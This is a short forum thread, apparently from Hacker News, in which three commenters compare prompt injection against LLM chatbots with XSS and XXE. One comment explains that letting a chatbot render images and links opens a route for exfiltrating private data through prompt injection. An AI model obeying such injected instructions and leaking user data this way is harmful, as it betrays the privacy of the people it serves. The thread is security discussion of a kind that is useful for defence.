[simonw]

These attacks aren't quite the same as HTML injection and XSS.

LLM-based chatbots rarely have XSS holes. They allow a very strict subset of HTML to be displayed.

The problem is that just supporting images and links is enough to open up a private data exfiltration vector, due to the nature of prompt injection attacks.

[dgoldstein0]

yup, basically showing if you ask AI nicely to <insert secret here>, it's dumb enough to do so. And that can then be chained with things that on their own aren't particularly problematic.

[tedunangst]

More like xxe I'd say.